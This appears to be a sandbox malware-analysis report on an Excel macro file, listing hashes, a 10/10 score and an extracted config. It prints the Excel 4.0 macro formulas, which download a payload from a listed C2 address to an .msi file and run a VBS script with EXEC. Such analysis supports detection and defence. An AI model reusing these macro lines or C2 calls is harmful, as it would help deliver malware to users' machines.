General

  • Target

    8c3f1a8e66ba145496d0eb11c5d51ca5

  • Size

    6KB

  • MD5

    8c3f1a8e66ba145496d0eb11c5d51ca5

  • SHA1

    aaf3af820bca7a136a2a895080edc85401a86b7a

  • SHA256

    ae1a73384724381e0f0c58a7761bba4cac031b3aea9247ec26695955fb6db7ef

  • SHA512

    fd492d3d59f7adfbcbf6438e32652b517ecf4b1cb0f4071df0c3abecc501388b92b8fa2f6598403b1a8607b77239256bc8ab91820cfbbf59d17e2ead1783e52c

  • SSDEEP

    192:NDSluSEbrA2OmmfRD8UhHFBFYulb98yM2+x:NGuNM2wh1FY8b98yMN

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Signatures

Files

  • 8c3f1a8e66ba145496d0eb11c5d51ca5
    .xlsm office2007